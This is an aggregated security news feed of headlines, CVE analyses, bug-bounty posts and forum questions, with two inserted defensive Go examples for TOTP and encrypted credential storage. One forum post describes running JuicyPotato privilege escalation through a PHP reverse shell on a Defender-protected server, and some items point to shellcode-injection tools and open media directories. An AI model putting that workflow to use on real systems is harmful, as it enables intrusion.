    Transparent Tribe dates back to 2012; this APT group has continuously attacked Indian military and government personnel.
  • Open

    NPM Vulnerability Discussion on Twitter
    Article URL: https://www.solipsys.co.uk/Chartter/1523831884786151424.svg Comments URL: https://news.ycombinator.com/item?id=31325154 Points: 131 # Comments: 185
  • Open

    Misconfigured Rate Limit in Sending Notifications to the Victims Phone Via the Endpoint " /faxes/inbox "
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1482919
  • Open

    F5 BIG-IP Unauthenticated RCE (CVE-2022-1388) Analysis
    Author: Knownsec 404 Lab kuipla, Billion Date: 2022-05-10 On 2022/5/4 F5 officially released a security advisory about an unauthenticated RCE (CVE-2022-1388) in BIG-IP. The official description of the vulnerability is "Undisclosed requests may bypass iControl REST authentication." The mitigation mentions that on lower versions, non-Connection:k...
    Protected Process Light (PPL) Attack
    Author: Li Mu Original link: https://mp.weixin.qq.com/s/Vp0UmGuGl_O2L4blUiHhSw Background concepts of PP/PPL(s) First, PPL stands for Protected Process Light, but before that there were only Protected Processes. The concept of protected processes was introduced with Windows Vista / Server 2008, and its purpose was not to protect your data or credentials. Its original goal was...
  • Open

    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on System Weakness »
    ResolveURI RXSS Imperva Waf Bypass
    Hi, Asslam-o-Alaikum Continue reading on Medium »
  • Open

    Ossuaries and Catacombs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    pictures of grease
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Any directories with First 48 episodes?
    submitted by /u/kevinc2c1 [link] [comments]
  • Open

    Start an analysis by looking for the Robots.txt
    In order for search engines such as Google, Bing and DuckDuckGo to present their results for search terms, it's necessary that information… Continue reading on Medium »

  • Open

    Grizzly.fi Token Forcible Minting
    In early April, our whitehats izhuer and Gwinhen from Pwned No More (PNM) reported a critical bug to the bug bounty program of Grizzly.fi. Continue reading on Medium »
    Why you should never trust any website
    Hello Everyone. Today I have an interesting story about a target that I have done some pentesting on. The result will shock you Continue reading on Medium »
    The Basics of Subdomain Takeovers
    A subdomain takeover is a vulnerability which allows an attacker to take the control of a subdomain which is not owned by that attacker. Continue reading on Medium »
    Bug Bounty Career: Web Hacking
    Details Continue reading on Medium »
    The Linuxless recon for bug bounty beginners who can’t code
    When I started doing bug bounties almost 2 years ago I saw this legendary video by tomnomnom and STÖK and thought it was sheer magic. Two… Continue reading on Medium »
    AppSec Tales VI | 2FA
    Application Security Testing of the 2FA form guidelines. Continue reading on System Weakness »
  • Open

    Global default settings page is accessible to non-administrators
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563139 - Bounty: $300
    Slowvote and Countdown can cause Denial of Service due to recursive inclusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1563142
  • Open

    San Diego CTF 2022 — Part Of The Ship…
    Category: OSINT  Difficulty: Easy  Challenge Author: Blarthogg  Team: OsirisProtocol (https://ctftime.org/team/151343/#.Ynh0zJJAj_s.link) Continue reading on Medium »
    War in Ukraine / May 8
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    The Cyber Institute — OSINT Challenge 3
    Hi everyone;  Here I go with a write up of my third challenge from the course OSINT Challenge developed by The Cyber Institute.   The main… Continue reading on Medium »
    War in Ukraine / May 7
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    reconDNS
    It was also developed with the aim of automating and facilitating the work of cybersecurity professionals. Continue reading on Medium »
  • Open

    Hackers are actively exploiting BIG-IP vulnerability with a 9.8 severity rating
    Article URL: https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/ Comments URL: https://news.ycombinator.com/item?id=31319852 Points: 14 # Comments: 3
  • Open

    Fuzzing Tests with Golang
    Fuzzing is a type of automated test that continuously manipulates inputs into the test program to find problems such as panics, bugs, or… Continue reading on Dev Genius »
    FFUF (Fuzz Faster U Fool)
    Currently, in the CTFs and walkthroughs I am doing, whether on Hack The Box or TryHackMe, whenever I need to do web fuzzing… Continue reading on Medium »
  • Open

    Next steps into entering the field
    So I graduated last year with a degree in Digital Forensics and Information Assurance. A month before graduation I landed a job doing IT help desk support for my city. We do a massive range of things, from running cable, to troubleshooting and resolving network issues, to other general IT stuff. I've even been working on getting an IR plan developed and put into place with the city I work for. It's great experience and I'm really liking it, but I do believe that I need to look into getting into my specific field within the next couple of years. My question is, will this IT job help me with finding an IR/SOC-type job in the future, experience-wise, and what jobs should I be looking for in order to get into the field (entry-level positions and such)? Mainly I'm just deciding how much time I should actually spend in this position so that it won't be a big waste of time career-wise. I'm always learning new things, but I also know the job is not directly in the career path I'm pursuing. submitted by /u/brinkv [link] [comments]
    The Case of the Disappearing Scheduled Task
    Good morning, It’s time for a new 13Cubed episode! This one is based upon a Microsoft Detection and Response (DART) blog post (see Resources section). I, along with two of my colleagues (Johnathan Sykes and Meaghan Bradshaw), performed extensive research regarding two different methods by which it is possible to create "hidden" Scheduled Tasks. While one of the methods has been discussed before, this research shows how it might be leveraged by a Threat Actor. The second technique, as best we can tell, is novel. Episode: https://www.youtube.com/watch?v=xrd0w505aS8 Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
    GCFA practice exam giveaway.. anyone
    Hi All, Just checking if any veteran can help me out with an extra GCFA practice exam give away. Recently failed it and reappearing :) submitted by /u/Mushroom-Fuzzy [link] [comments]
  • Open

    Learning Linux kernel exploitation – Part 2 – CVE-2022-0847
    Article URL: https://twitter.com/0xricksanchez/status/1523633205630619648 Comments URL: https://news.ycombinator.com/item?id=31316513 Points: 3 # Comments: 0
    F5 BIG-IP RCE exploitation (CVE-2022-1388)
    Article URL: https://packetstormsecurity.com/files/167007/F5-BIG-IP-Remote-Code-Execution.html Comments URL: https://news.ycombinator.com/item?id=31316045 Points: 2 # Comments: 0
  • Open

    Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
    submitted by /u/SCI_Rusher [link] [comments]
    Vulnerability Analysis - CVE-2022-1388 - Randori
    submitted by /u/zxcvqwerpl [link] [comments]
    POC for CVE-2022-1388
    submitted by /u/scopedsecurity [link] [comments]
    Expanding on Existing IoCs to Leverage Immediate Threats Simulations
    submitted by /u/bayhitlaw [link] [comments]
  • Open

    SecWiki News 2022-05-09 Review
    [D3FEND] An interpretation of the cybersecurity countermeasure knowledge-graph framework, by ourren; SecWiki Weekly (Issue 427), by ourren; From a 500 error to account takeover, by SecIN community. For more recent articles, visit SecWiki.
  • Open

    Windows Recon: Host Discovery
    Hello, today I will show you some of the ways in which we can perform host discovery on Windows. Continue reading on Medium »
    Red, Blue & Purple Team: Attacker, Defender & Facilitator
    Introduction:  Building an effective & secure platform is critical! In this era of rising technologies, it is becoming more and more… Continue reading on Medium »
    Malicious PDF Generator
    Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh Continue reading on Medium »
  • Open

    THM Writeup: Ra 2
    No content preview
  • Open

    What to do if you receive a strange email with random letters and numbers?
    This morning I received an email from "Veronika Mccreadie", and the problem is: it appeared on my main page instead of in spam. The whole email is only random numbers and letters. It has something attached. So I need to know what to do with this. I haven't even opened it, just in case it can do anything, hahaha, yeah, I'm that paranoid. submitted by /u/chem_OS [link] [comments]
  • Open

    FreeBuf Morning Report | HiPhi cars caught up in privacy-leak controversy; Musk's Twitter acquisition may face security review
    According to reports, the dashcam in HiPhi cars can receive signals from other HiPhi cars via the owner-interconnect feature and read the contents of those cars' dashcams.
    New BlackByte ransomware variant appears, written in Go
    BlackByte is a full-featured ransomware family that uses multiple attack techniques and keeps updating its samples, which may pose a significant threat to organizations' data security.
    How to unpack malicious Python executables
    How do you recover the source code from a packed Python program to speed up analysis?
    US sanctions Blender for laundering money for North Korean hackers
    The US Treasury said Lazarus has laundered more than $20.5 million through Blender and formally announced sanctions on the cryptocurrency mixing service Blender.
    Google Play suspends paid-app downloads and updates for Russian users
    Google will block Russian users and developers from downloading or updating paid apps from the Google Play store.
    Lazarus arsenal update: analysis of recent Andariel attack samples
    The Andariel group mainly attacks South Korean organizations, especially financial institutions, for financial gain and cyber espionage.
    Note: NIST has updated its cybersecurity supply chain risk guidance
    The guidance covers trends and best practices related to supply chain attacks, directs enterprises on managing software supply chain risk effectively, and describes how to respond when a supply chain attack hits.
    US agricultural machinery manufacturer AGCO hit by ransomware attack
    AGCO recently announced that it suffered a ransomware attack that affected some of its production facilities.
    US offers $15 million reward for information on key figures of the Conti ransomware gang
    To help identify and locate the core members and accomplices of the notorious Conti ransomware gang, the US State Department has put up a $15 million reward.
    First episode of "New Forces in Cybersecurity" goes live; Solo launch season full of quotable lines
    Chen Kunpeng, CEO of Beijing Yiyun Technology, was the first guest, presenting on a real-name data-access security mesh.
  • Open

    Japanese ASMR ear licking videos and audio works.
    submitted by /u/MrRoboto12345 [link] [comments]
  • Open

    JBoss EAP/as <= 6.* RCE 及 rpc 回显
    Author: Y4er. Original link: https://y4er.com/post/jboss-4446-rce-and-rpc-echo-response/ Saw a JBoss 0day RCE posted on Twitter, so here is an analysis. Preface: this bug was a talk at the Alligator Conference 2019 abroad; the slides are here https://s3.amazonaws.com/files.joaomatosf.com...
  • Open

    Fuzzing
    Hello all, I'm new to exploit development and I was wondering what common tools are used to fuzz GUI applications. All the tutorials I have seen fuzz command-line applications. Thanks. submitted by /u/PuzzledWhereas991 [link] [comments]

  • Open

    Career in computer forensics pretty much over.. need some advice/support (more details in post)
    Hey all, long-time lurker here. I've been in computer forensics for a bit now and loving it. But sadly something has happened recently that has, well, shot my career in this field in the head. Quick background: I work in a state police child exploitation unit (won't say exactly where, but western states and the weather is beautiful right now) doing forensics. Without getting into any details, it came about that not only myself but 15+ others I know were victimized when we were in middle school. It gets worse than that, but that's the SparkNotes. To say it's been traumatic is an understatement. I haven't been to work in a few weeks and I've had a chat with my boss and we both agree it's not a job I can keep doing. I gotta chase down a bunch of stuff and I'm trying my best to take care of myself (seeing a therapist, gone straight edge, working with my doc, thank god for health insurance lol) but shit's been rough, man. Has anyone seen or experienced something similar? Any advice? Most importantly, computer forensics isn't something I'm likely to have the capacity to do moving forward given my mental state (worried about PTSD). Do you know of any fields with an easy lateral transition or transferable skill sets? I've been thinking of cyber security if I can swing it, but I'd rather stay gov't if I can for the benefits, as I'll need them. submitted by /u/59472993757 [link] [comments]
    A starter's guide on recovering damaged and rotten CDs
    TL;DR: I'm using ddrescue/dvdisaster/testdisk and photorec to recover data from a disc-rotted CD. A prettier version of this post is available here. The First Hurdle: Reading Data from a Damaged CD / DVD. The first problem anyone with a damaged disc is going to encounter is that they cannot copy files from it using a regular copying mechanism (e.g. file explorer, terminal commands). This is due to the fact that normal file copying mechanisms will not attempt to read from a bad sector or unreadable data. Instead, they will freeze, or throw an error upon encountering such data. To recover data from a damaged medium, we need specialized tools that are aware of this problem and will continue with the reading process even after encountering errors. Three such tools are ddrescue, dvdisast…
  • Open

    Email Spoofing due to Invalid SPF Record Vulnerability
    Supp Folks! Continue reading on Medium »
    How I Paid For My Holiday With Bug Bounty
    Today I am detailing how I was able to afford a holiday utilising Bug Bounty only. Continue reading on Medium »
    P1 Bug — PII information disclosure
    Hello amazing penetration testers and bug bounty hunters, I hope you all are fine ❤ In this blog I will be explaining the bug that I… Continue reading on Medium »
    Can analyzing javascript files lead to remote code execution?
    In today’s blog, I’m going to show you how analyzing javascript files can lead to access unrestricted endpoints and to understand how the… Continue reading on Medium »
    How to Find bugs on Dutch Govt……..!
    I have posted my swag on social media and so on, so I'm getting lots of DMs asking how we can find vulnerabilities (bugs) in Dutch government sites and what can be the… Continue reading on Medium »
    Nmap Basic commands — 1
    Introduction Continue reading on Medium »
    Dockerize your hacking workflow
    I’ve been a fan of containerization for a long time. I do not want to create a flame post; all I want to say is that there are situations… Continue reading on Medium »
    Html Injection Web Application Vulnerability : Introduction Part
    What Is HTML Injection? Continue reading on Medium »
    What happened to me
    Today I will write about one of my recent findings which lead to a $4000 bounty issue. I will publish at 11 PM IST. Continue reading on Medium »
    Worst Bug bounty sites you should avoid
    Hi Hunters! Continue reading on Medium »
  • Open

    What positions should a self-taught developer with 3 years experience in IT security apply to?
    Hi all, I have 3 years IT security experience (mix of auditing/compliance/user support) for a major company, and I am a self-taught developer (MERN stack). I have a degree unrelated to CS. I'm having trouble figuring out what positions to apply to. If I apply to web development positions, they don't seem to care about my IT/security background at all. It's basically just how well I know their (exact) stack. If I apply to security engineering positions, they seem to care more about what certs I have, networking knowledge, and things of that nature, and my programming skills don't seem as relevant. It feels like I'm not a perfect fit for either position. There must be a job title/position that utilizes my specific background. I'm curious about specific job titles and roles. submitted by /u/C4KggxcEJlTefYKisLJE [link] [comments]
    Transfer 2FA Tokens from GAUTH to Authy?
    Is this possible? I can duplicate the tokens to another instance of GAUTH, for example on a 2nd smartphone, via QR codes. Can I also duplicate or export/import those tokens from GAUTH to Authy? All I'd have to do is export the secret and type it into Authy. But does the QR code generated by GAUTH contain the secret? Thx for enlightening me. submitted by /u/junghansmega4 [link] [comments]
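An added example, not part of the post above and not code from either authenticator app: the QR code Google Authenticator shows is an otpauth://totp/ URI, and its secret= parameter is the base32-encoded shared key. Anything that can parse that URI and run RFC 6238 produces the same codes, which is both why importing it into another app works and why a photo of that QR code is equivalent to the seed itself. The URI below is constructed; the secret is the RFC 6238 test key "12345678901234567890" in base32.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base32"
	"encoding/binary"
	"errors"
	"fmt"
	"net/url"
	"strconv"
	"strings"
	"time"
)

// OTPParams is what a TOTP QR code actually carries: label, issuer and the
// raw shared key, plus the (optional) digits and period parameters.
type OTPParams struct {
	Label  string
	Issuer string
	Secret []byte
	Digits int
	Period int64
}

// ParseOTPAuthURI extracts the shared secret and parameters from an
// otpauth://totp/ URI. Defaults follow the common convention: 6 digits, 30 s.
func ParseOTPAuthURI(raw string) (OTPParams, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return OTPParams{}, err
	}
	if u.Scheme != "otpauth" || u.Host != "totp" {
		return OTPParams{}, errors.New("not an otpauth://totp URI")
	}
	q := u.Query()
	// Apps are lenient about case and padding; normalise before decoding.
	sec := strings.ToUpper(strings.TrimRight(q.Get("secret"), "="))
	key, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(sec)
	if err != nil || len(key) == 0 {
		return OTPParams{}, errors.New("secret is not valid base32")
	}
	p := OTPParams{Label: strings.TrimPrefix(u.Path, "/"), Issuer: q.Get("issuer"), Secret: key, Digits: 6, Period: 30}
	if d := q.Get("digits"); d != "" {
		if p.Digits, err = strconv.Atoi(d); err != nil {
			return OTPParams{}, err
		}
	}
	if s := q.Get("period"); s != "" {
		if p.Period, err = strconv.ParseInt(s, 10, 64); err != nil {
			return OTPParams{}, err
		}
	}
	return p, nil
}

// TOTP computes the RFC 6238 code (HMAC-SHA1, RFC 4226 dynamic truncation)
// for the given Unix time. Any app holding the same secret gets the same code.
func TOTP(secret []byte, unix int64, digits int, period int64) string {
	var msg [8]byte
	binary.BigEndian.PutUint64(msg[:], uint64(unix/period)) // moving counter
	mac := hmac.New(sha1.New, secret)
	mac.Write(msg[:])
	h := mac.Sum(nil)
	off := int(h[len(h)-1] & 0x0f)
	code := binary.BigEndian.Uint32(h[off:off+4]) & 0x7fffffff
	mod := uint32(1)
	for i := 0; i < digits; i++ {
		mod *= 10
	}
	return fmt.Sprintf("%0"+strconv.Itoa(digits)+"d", code%mod)
}

func main() {
	// Constructed URI; the secret is the RFC 6238 test key in base32.
	uri := "otpauth://totp/Example:alice@example.com?secret=GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ&issuer=Example&digits=6&period=30"
	p, err := ParseOTPAuthURI(uri)
	if err != nil {
		fmt.Println("parse:", err)
		return
	}
	fmt.Printf("issuer=%s label=%s code=%s\n", p.Issuer, p.Label, TOTP(p.Secret, time.Now().Unix(), p.Digits, p.Period))
}
```

The practical consequence: an exported QR code or otpauth URI must be treated like a password, and once the secret is typed into Authy the same seed exists in two places, so revoking one device's token does not revoke the other.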
  • Open

    Mac Software, Images, Videos, and much more
    submitted by /u/ilikemacsalot [link] [comments]
    Music?
    Is music now off the table? Haven't seen any new posts for a while. submitted by /u/Top-Nefariousness908 [link] [comments]
  • Open

    SecWiki News 2022-05-08 Review
    Communication analysis for smart-meter security, by ourren; OffensiveNotion: Notion as a platform for offensive operations, by ourren. For more recent articles, visit SecWiki.
  • Open

    HintInject
    Embedding shellcode into the PE Hint/Name Table https://github.com/frkngksl/HintInject submitted by /u/DarkGrejuva [link] [comments]
  • Open

    I started a newsletter and would love your feedback
    submitted by /u/nunorbatista [link] [comments]
  • Open

    Good News Roundup: the OSINT-inspired Geek Edition
    Today’s Good News Roundup has OSINT news, AI and robotics breakthroughs for health & human rights, & news about the Navalny app in Russia Continue reading on Medium »
    The Future of the Internet — METINT & METfluence?
    What is the future of OSINT, cyber HUMINT, and online influence? One only needs to look at Mark Zuckerberg, who decided to rebrand Facebook —… Continue reading on Medium »
    NahamCon CTF 2022: OSINT Challenge
    NahamCon CTF 2022 is a gamified cyber security event and part of free virtual security conference Hosted by STOK, John Hammond and… Continue reading on Medium »
    Web Archive as an OSINT Tool
    Using web archives allows you to see what a web page or site looked like in the past. Most popular web archives: https://archive.org/… Continue reading on Medium »
    War in Ukraine / May 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    SPY NEWS: 2022 — Week 18
    Summary of the espionage-related news stories for the Week 18 (1–7 May) of 2022. Continue reading on Medium »
  • Open

    Reflected xss in https://sh.reddit.com
    Reddit disclosed a bug submitted by abhiramsita: https://hackerone.com/reports/1549206 - Bounty: $5000
  • Open

    IDOR: a simple and very dangerous vulnerability
    Hello guys! Continue reading on Medium »
    Everything you need to know about LSASS (From Red Team Perspective)
    If you open Task Manager on Windows, you will see a process running called 'lsass.exe'. LSASS (Local Security Authority Server… Continue reading on Pentester Nepal »

  • Open

    Hiding Your EXE In Alternate Data Streams
    submitted by /u/Diesl [link] [comments]
  • Open

    How advanced are (photo) image forensics at present?
    I am not in this field; I am a photographer/software person. I've been researching image forensics, but haven't quite got a straight answer on this: Is it plausible or even possible for someone to take a photograph with a digital camera, make edits to that photograph that make non-trivial changes to its appearance, and then hide these adjustments through technical skill, software designed for such a job or otherwise fudging EXIF info etc, resulting in an image that can't be identified as fake with forensic analysis, be it automated tools or even someone literally checking each block of data? submitted by /u/MonstrousPourings [link] [comments]
  • Open

    What caused Psychic Signatures Vulnerability (CVE-2022–21449)?
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe — Nessus
    No content preview
    Shellcode Analysis
    No content preview
    I Secured More Than 10 Million User's Data on the Kerala Government Website Maintained by NIC.
    No content preview
    C Language for Hackers & Beyond! 0x01
    No content preview
    India’s Biggest Hack — 1100+ Security bugs in Indian Government Websites and Servers compromised
    No content preview
  • Open

    Code4rena — First 1M$ stats
    After 14 months of grinding Code4rena audit contests I’m the first person to hit 1M$ in awards and take the number one spot on the… Continue reading on Medium »
    Text Based Injection | Content Spoofing on ISRO Website
    Content spoofing, also referred to as content injection, “arbitrary text injection” or virtual defacement, is an attack targeting a user… Continue reading on Medium »
    The $16,000 Dev Mistake
    Hello all! Continue reading on Medium »
    Remote Code Execution Web Application Vulnerability : Prevention Part
    Prevention Continue reading on Medium »
  • Open

    Mr.Holmes — Osint Tool
    Mr.Holmes is an information-gathering (OSINT) tool. Its main goal is to obtain information about domains, usernames and… Continue reading on Medium »
    Intelligence Gathering with Open-Source Tools
    Intelligence gathering is becoming increasingly important to organizations today. Continue reading on Medium »
    Collection of data about companies in Russia and around the world
    Today we will study publicly available sources that can be used to study Russian and foreign counterparties, as well as assess their… Continue reading on Medium »
    Cosa sarebbe l’OSINT senza… l’OSINT?
    The title is not meant to be clickbait at all, but at least a little provocative, yes. Anyone who comes across the results of a… Continue reading on Medium »
    War in Ukraine / May 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
  • Open

    Storing Decryptable Passwords in DB for Automation Usage
    TLDR: I am making a REST session management solution for industrial automation purposes and need to automatically log into devices to perform configurations. NOTE: these devices are 99% of the time going to be isolated to private networks/VPNs (i.e., they will not have a public IP). Dilemma: I am being tasked with creating a service that can store hardware device credentials so automated configurations (and metrics scraping) can be done. The hardware in question only allows REST session logins via a POST method where the user and (unencrypted) password are sent in the message body. This returns a session cookie that my service then stores (in memory). The service in question consists of a Linux (Ubuntu 20.04) server running a FastAPI Python backend and a SQLite3 embedded file DB. Storing credentials? My background is not in security, so this is all very new to me, but it seems that I should prefer storing a hash (e.g., bcrypt) of my password in my DB for future verification; however, there will not be any future verification, as this is all automated. This brings me to what seems like the only solution: hashing the password and using that (somehow) to seed the password encryption, then storing the hashed password and encrypted password in the DB for decryption later. I know this provides almost 0 security if the DB is compromised, but I am at a loss for alternative solutions. Since the DB is embedded, maybe there is some added assurance that the server itself would have to be compromised before the DB itself is compromised? I don't know if there is a technical "right" approach to this, maybe not, but if anyone has any advice I am all ears. NOTE: I do not control the authentication type for the devices my service has to authenticate to. User/pass session-based auth is the only way atm, so JWT or token-based auth is out of the question. submitted by /u/jmehrs [link] [comments]
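An added example, not the poster's code: the standard answer to the dilemma above is to keep the credentials reversible but encrypted with an authenticated cipher, and to keep the key somewhere the database file is not (environment injected at deploy time, a KMS, an HSM or the OS keyring). Deriving the key from the password's own hash, as the post considers, puts the key in the same row as the ciphertext. The example is in Go for a stdlib AES-256-GCM; the same design ports directly to the poster's Python service with the cryptography package's AESGCM. The environment variable name DEVICE_CRED_KEK, the device IDs and the password are assumptions constructed for the example.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/hex"
	"errors"
	"fmt"
	"os"
)

// Record is what the SQLite row should hold instead of a plaintext password:
// a random 96-bit nonce and the AES-256-GCM ciphertext (which includes the
// authentication tag). The key is never written to the database.
type Record struct {
	DeviceID string
	Nonce    []byte
	Sealed   []byte
}

// LoadKEK reads the 32-byte key-encryption key from the environment. The
// variable name DEVICE_CRED_KEK is hypothetical; in production this would be
// fetched from a KMS/HSM or the OS keyring. The point is that it lives
// outside the DB file, so a copied .sqlite file alone yields nothing.
func LoadKEK() ([]byte, error) {
	key, err := hex.DecodeString(os.Getenv("DEVICE_CRED_KEK"))
	if err != nil || len(key) != 32 {
		return nil, errors.New("DEVICE_CRED_KEK must be 64 hex characters (32 bytes)")
	}
	return key, nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal encrypts a device password under kek. The device ID is passed as
// associated data, so a ciphertext copied onto another device's row fails
// to decrypt instead of silently logging that device in with the wrong creds.
func Seal(kek []byte, deviceID, password string) (Record, error) {
	gcm, err := newGCM(kek)
	if err != nil {
		return Record{}, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil { // fresh random nonce per record
		return Record{}, err
	}
	ct := gcm.Seal(nil, nonce, []byte(password), []byte(deviceID))
	return Record{DeviceID: deviceID, Nonce: nonce, Sealed: ct}, nil
}

// Open recovers the plaintext password right before the REST login POST;
// any tampering with the row, or a wrong key, is rejected here.
func Open(kek []byte, r Record) (string, error) {
	gcm, err := newGCM(kek)
	if err != nil {
		return "", err
	}
	pt, err := gcm.Open(nil, r.Nonce, r.Sealed, []byte(r.DeviceID))
	if err != nil {
		return "", fmt.Errorf("record for %s failed authentication: %w", r.DeviceID, err)
	}
	return string(pt), nil
}

func main() {
	kek, err := LoadKEK()
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	rec, err := Seal(kek, "plc-07", "constructed-device-password")
	if err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
	pw, err := Open(kek, rec) // what the login routine would call
	fmt.Printf("device=%s sealed=%d bytes recovered=%q err=%v\n", rec.DeviceID, len(rec.Sealed), pw, err)
}
```

Residual risk is exactly what the post suspected: whoever has root on the server can read the key and decrypt everything, so the controls that matter there are restricting who can read the process environment, rotating the key (re-seal every row under a new key), and logging every Open call so credential use is auditable.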
    Trying to run JuicyPotato through a PowerShell script, but I get "recv failed with error: 10038"
    I have a reverse-powershell session to a Windows Server 2016 VM as the built-in IIS user (nt authority\iusr), and since the OS is vulnerable to this exploit, I'm trying to run JuicyPotato to execute a bat file as SYSTEM. However I am facing a problem: it looks like I can't create new processes, so uploading the exe and running it through my shell is not an option. The way I decided to solve this problem is by using the process I already have, the reverse powershell process. So I converted JuicyPotato into a DLL that exports the main() function, and I wrote a small PowerShell-compatible C# script that P/Invokes it and executes the exploit. But when I try to run it, I get the following error: COM -> recv failed with error: 10038 I know for a fact that using this exploit through PowerShell is possible, because I've tried it in a second VM with Defender disabled and it worked. I also know that the target system can create TCP listeners as the iusr user (the error seems to be a socket error), because that's how I have a fully functional reverse shell. So what gives? Looking at JP's source code, it looks like it failed to read from a TCP listener socket for some reason, but I don't understand why. Recreating this scenario for testing is very simple: Create a VM with Windows Server 2016 Datacenter Edition Configure IIS with PHP Make sure that Defender is enabled Drop a reverse-shell PHP script into wwwroot and connect to it Upload my modified JuicyPotato DLL and the ps1 script that runs it, or create your own by downloading the JP source code, change the output type to DLL and add this function to it. Run the ps1 script through your remote shell Any help is appreciated. submitted by /u/Sparky2199 [link] [comments]
    Offensive security, remote US jobs for an EU dude
    How feasible or likely is to find a job in US offsec sector (possibly remote) for someone who lives in Germany of EU citizenship? EDIT: Thanks everyone for all your answers, they are pretty much what I expected. Thinking of a mid-career transition into infosec from software engineering within next couple of years, so I walk around asking different infosec groups, perhaps stupid questions, but I wanted to make sure that I see all opportunities and all consequences of going for this change. submitted by /u/andy-codes [link] [comments]
  • Open

    Huge amount of Movies, TV Shows, and other Videos
    http://203.96.191.70/Data/ Has been posted before, but its back online again. submitted by /u/amritajaatak [link] [comments]
    A lot of nostalgia Flash games (fast download speed too)
    http://mahergames.ru.ma/uploads/ submitted by /u/Pelicaros [link] [comments]
  • Open

    SecWiki News 2022-05-07 Review
    Building an automated anime-tracking system with Sonarr, by ourren; flybirds: a natural-language, cross-platform, cross-framework BDD UI automation testing solution, by ourren; A first look at Java security: JavaAgent, by SecIN community; supplier: a collection of offensive vulnerabilities in mainstream suppliers, by ourren. For more recent articles, visit SecWiki.
  • Open

    Default Credentials Cheat Sheet
    One place for all the default credentials, to assist Blue/Red teamers in finding devices with default passwords. Continue reading on Medium »
  • Open

    XXE from 0 to 1
    XML, as an extensible markup language, is used in practically every application for reading/writing data and has become a common language for data exchange.
    US Commerce Department agency recommends this way of generating software supply chain "ID cards"
    This handbook outlines the process for generating a Software Bill of Materials (SBOM) and how software vendors should provide them.
    Exploring the principles behind MSSQL privilege escalation
    This article analyzes the principles of these privilege-escalation methods and summarizes them; corrections from fellow researchers are welcome.
    Jixing Lab tools: anyone can become a "weak-password master"
    blaster is a powerful weak-password detection tool for checking website logins for weak passwords.
    hackmyvm series 8: REI
    This article is for technical discussion and learning only; do not use it for illegal purposes, for which the author bears no responsibility.
    APT attacks from the defender's perspective
    This article divides APT defense methods into three categories, monitoring, detection and mitigation techniques, and reviews each in turn.
    Researchers warn: "Raspberry Robin" may be spreading via external drives
    Security researchers recently discovered a new type of Windows malware with worm-like capabilities.
    "Network Security Standard Practice Guide: Technical Specification for Certification of Cross-Border Personal Information Processing Activities (Draft for Comment)" released
    The Practice Guide sets out requirements covering basic principles, the obligations of the parties involved in cross-border processing, and protection of the rights and interests of personal-information subjects.
    Ukraine IT Army and Anonymous keep attacking Russian entities
    The Anonymous hacker collective, together with the Ukraine IT Army, continues to launch cyberattacks against Russian entities.
    QNAP fixes critical QVR remote command execution vulnerability
    QNAP has released several security advisories.
    FreeBuf Weekly | DNS vulnerability affects millions of IoT devices; attackers hijack UK National Health Service email accounts
    Happy weekend, FreeBufers. Here is this week's FreeBuf Weekly.
    FreeBuf Morning Report | Xbox outage worldwide; IKEA Canada discovers data breach
    Microsoft said the Xbox Live service went down due to a major outage, leaving customers in many regions unable to launch or buy games.
    Nvidia fined $5.5 million for failing to disclose crypto mining's impact on its business
    Nvidia admitted it failed to adequately disclose the impact of crypto mining on its gaming business and agreed to pay a $5.5 million fine to the US Securities and Exchange Commission.
    What is an IP conflict and how do you resolve it?
    An IP address conflict occurs when two or more devices on the same network are assigned the same IP address.
    The companies for the "New Forces in Cybersecurity" Solo launch season are officially announced; it sets sail at 10 a.m. on May 9!
    Nine companies have been officially announced; see you next Monday for the New Forces in Cybersecurity Solo launch season!
    Enterprise data security as seen through "The Wind Blows from Longxi"
    The "Three Kingdoms plus espionage" TV drama "The Wind Blows from Longxi" is currently airing; on a battlefield where the realm is split three ways and war rages everywhere, there is not only the clash of blades but also a contest of secret intelligence surging in the shadows.
    [Star Classroom] Quick start: how to build a network intrusion detection system with Suricata?
    Suricata is a free, open-source, mature, fast and robust network threat detection engine.
  • Open

    Exploiting IRCTC along with few other government domains through XXE
    submitted by /u/rotoutjog [link] [comments]
  • Open

    Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞分析
    Author: f-undefined team, f0cus7. Original link: https://mp.weixin.qq.com/s/sxj7Yn9m2JolLkuP1BGc5Q Over the past year the Cisco RV34x series had a string of disclosed vulnerabilities; after multiple rounds of patching, the series was still compromised at Pwn2Own Austin 2021 at the end of the year by IoT Inspector Research Lab, specifically by chaining three logic bugs to achieve R...
  • Open

    Fuzzing ClamAV with real malware samples
